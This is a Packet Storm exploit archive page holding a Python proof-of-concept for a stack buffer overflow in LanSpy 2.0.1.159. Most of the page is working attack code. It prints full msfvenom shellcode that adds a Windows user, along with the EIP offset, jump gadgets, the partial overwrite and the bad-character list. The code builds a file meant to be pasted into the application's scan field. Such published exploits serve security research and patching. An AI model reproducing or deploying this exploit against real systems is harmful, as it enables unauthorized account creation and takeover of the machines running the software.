what you don't know can hurt you

LanSpy 2.0.1.159 Stack Buffer Overflow

LanSpy 2.0.1.159 Stack Buffer Overflow
Posted Jun 23, 2020
Authored by Paolo Stagno

LanSpy version 2.0.1.159 stack buffer overflow exploit that adds a user.

tags | exploit, overflow
MD5 | b0153a74496953acb5708e0d11dbf08d

LanSpy 2.0.1.159 Stack Buffer Overflow

Change Mirror Download
"""
Exploit title: LanSpy v.2.0.1.159 - Stack Buffer Overflow
Exploit Author: Paolo Stagno aka VoidSec - voidsec@voidsec.com - https://voidsec.com
Vendor Homepage: https://lizardsystems.com/
Download: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe
Version: v.2.0.1.159
Tested on: Windows 10 Pro x64 v.1909 Build 18363.418
Category: local exploits
Platform: windows
Usage: Open the APP > click on the scan field > paste the contents from the generated "LanSpy_v.2.0.1.159_exploit.txt" file
"""
#!/usr/bin/python
import os,subprocess,struct,platform
filename="LanSpy_v.2.0.1.159_exploit.txt"
EIP_offset = 680

"""
03F9FB48 start of our "junk" buffer
03F9FDDB end of not corruppted "junk" buffer
03F9FDDB - 03F9FB48 = 659 - 22 (pad+stack_adj) = 637 bytes for shellcode
"""

stack_adj = "\x83\xec\x78" * 10 # stack_adj; sub esp,0x78 (120*10=1200)
# BAD CHARS: \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c
# msfvenom -p windows/adduser USER=VoidSec PASS=VoidSec1! -a x86 --platform windows -e x86/alpha_mixed -f python -v shellcode
# Payload size: 608 bytes
shellcode = b""
shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5b\x53\x59\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43"
shellcode += b"\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50"
shellcode += b"\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += b"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
shellcode += b"\x41\x42\x75\x4a\x49\x79\x6c\x48\x68\x4e\x62"
shellcode += b"\x63\x30\x75\x50\x45\x50\x71\x70\x4e\x69\x4a"
shellcode += b"\x45\x46\x51\x39\x50\x65\x34\x4e\x6b\x42\x70"
shellcode += b"\x70\x30\x4c\x4b\x62\x72\x56\x6c\x6e\x6b\x50"
shellcode += b"\x52\x36\x74\x4c\x4b\x62\x52\x66\x48\x36\x6f"
shellcode += b"\x6e\x57\x53\x7a\x54\x66\x35\x61\x59\x6f\x4c"
shellcode += b"\x6c\x47\x4c\x30\x61\x33\x4c\x57\x72\x66\x4c"
shellcode += b"\x31\x30\x79\x51\x38\x4f\x66\x6d\x35\x51\x58"
shellcode += b"\x47\x6d\x32\x38\x72\x51\x42\x63\x67\x6e\x6b"
shellcode += b"\x63\x62\x42\x30\x4e\x6b\x52\x6a\x67\x4c\x4e"
shellcode += b"\x6b\x30\x4c\x72\x31\x74\x38\x39\x73\x42\x68"
shellcode += b"\x43\x31\x7a\x71\x36\x31\x4c\x4b\x50\x59\x31"
shellcode += b"\x30\x46\x61\x58\x53\x6e\x6b\x67\x39\x65\x48"
shellcode += b"\x58\x63\x47\x4a\x67\x39\x6e\x6b\x30\x34\x6e"
shellcode += b"\x6b\x63\x31\x78\x56\x70\x31\x39\x6f\x4c\x6c"
shellcode += b"\x6f\x31\x6a\x6f\x64\x4d\x53\x31\x6a\x67\x65"
shellcode += b"\x68\x6d\x30\x61\x65\x4b\x46\x66\x63\x63\x4d"
shellcode += b"\x69\x68\x75\x6b\x71\x6d\x44\x64\x50\x75\x68"
shellcode += b"\x64\x53\x68\x6c\x4b\x42\x78\x67\x54\x33\x31"
shellcode += b"\x5a\x73\x72\x46\x4e\x6b\x46\x6c\x72\x6b\x6c"
shellcode += b"\x4b\x70\x58\x77\x6c\x63\x31\x69\x43\x4c\x4b"
shellcode += b"\x65\x54\x6c\x4b\x36\x61\x4e\x30\x4c\x49\x37"
shellcode += b"\x34\x37\x54\x56\x44\x43\x6b\x51\x4b\x63\x51"
shellcode += b"\x31\x49\x33\x6a\x52\x71\x6b\x4f\x49\x70\x51"
shellcode += b"\x4f\x63\x6f\x71\x4a\x6e\x6b\x34\x52\x68\x6b"
shellcode += b"\x4e\x6d\x61\x4d\x30\x6a\x66\x61\x4e\x6d\x4f"
shellcode += b"\x75\x68\x32\x67\x70\x75\x50\x57\x70\x32\x70"
shellcode += b"\x72\x48\x66\x51\x6e\x6b\x42\x4f\x6f\x77\x39"
shellcode += b"\x6f\x39\x45\x6d\x6b\x68\x70\x38\x35\x39\x32"
shellcode += b"\x33\x66\x53\x58\x69\x36\x5a\x35\x6f\x4d\x6f"
shellcode += b"\x6d\x49\x6f\x79\x45\x75\x6c\x44\x46\x33\x4c"
shellcode += b"\x34\x4a\x6b\x30\x79\x6b\x4d\x30\x44\x35\x67"
shellcode += b"\x75\x4d\x6b\x30\x47\x36\x73\x34\x32\x70\x6f"
shellcode += b"\x63\x5a\x57\x70\x53\x63\x4b\x4f\x78\x55\x75"
shellcode += b"\x33\x70\x6d\x42\x44\x34\x6e\x65\x35\x61\x68"
shellcode += b"\x45\x35\x65\x70\x74\x6f\x45\x33\x51\x30\x52"
shellcode += b"\x4e\x63\x55\x31\x64\x71\x30\x31\x65\x51\x63"
shellcode += b"\x45\x35\x42\x52\x37\x50\x52\x76\x62\x4f\x43"
shellcode += b"\x59\x70\x64\x42\x73\x30\x65\x43\x53\x65\x70"
shellcode += b"\x30\x56\x42\x4f\x71\x79\x55\x34\x51\x43\x73"
shellcode += b"\x55\x65\x33\x46\x51\x57\x51\x37\x50\x76\x4f"
shellcode += b"\x63\x71\x42\x64\x42\x64\x77\x50\x75\x76\x46"
shellcode += b"\x46\x37\x50\x30\x6e\x31\x75\x54\x34\x77\x50"
shellcode += b"\x50\x6c\x50\x6f\x55\x33\x61\x71\x42\x4c\x75"
shellcode += b"\x37\x32\x52\x70\x6f\x64\x35\x62\x50\x35\x70"
shellcode += b"\x72\x61\x65\x34\x50\x6d\x62\x49\x70\x6e\x43"
shellcode += b"\x59\x72\x53\x64\x34\x53\x42\x31\x71\x53\x44"
shellcode += b"\x70\x6f\x64\x32\x64\x33\x65\x70\x71\x46\x32"
shellcode += b"\x4f\x55\x39\x63\x54\x33\x63\x72\x45\x52\x43"
shellcode += b"\x55\x70\x46\x4f\x43\x71\x42\x64\x52\x64\x35"
shellcode += b"\x50\x41\x41"

pad = "A" * 12
jmp_far = "\xe9\x5c\xfd\xff\xff" # JMP FAR BACKWARDS
jmp_short = "\x41\xeb\xf6\x41" # ECX point here ; JMP SHORT BACKWARDS
eip = "\xad\x40\x40" # EIP 0x004040ad : jmp ecx | startnull {PAGE_EXECUTE_READ} [lanspy.exe] ; partial overwrite to keep \x00 (that is a null byte)
# original nSEH and SEH below are left untouched
# nSEH
# SEH

payload = "A" * ( EIP_offset - len(stack_adj) - len(shellcode) - len(pad) - len(jmp_far) - len(jmp_short) ) + stack_adj + shellcode + pad + jmp_far + jmp_short + eip

f = open(filename, 'w')
f.write(payload)
f.close()

print("Wrote {} bytes".format(len(payload)))

ver = platform.machine()
if ver.endswith('64'):
debuggercmd = "C:\\Program Files (x86)\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
else:
debuggercmd = "C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
subprocess.call([debuggercmd,"C:\\Program Files (x86)\\LizardSystems\\LanSpy\\lanspy.exe",""])
Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    27 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    32 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close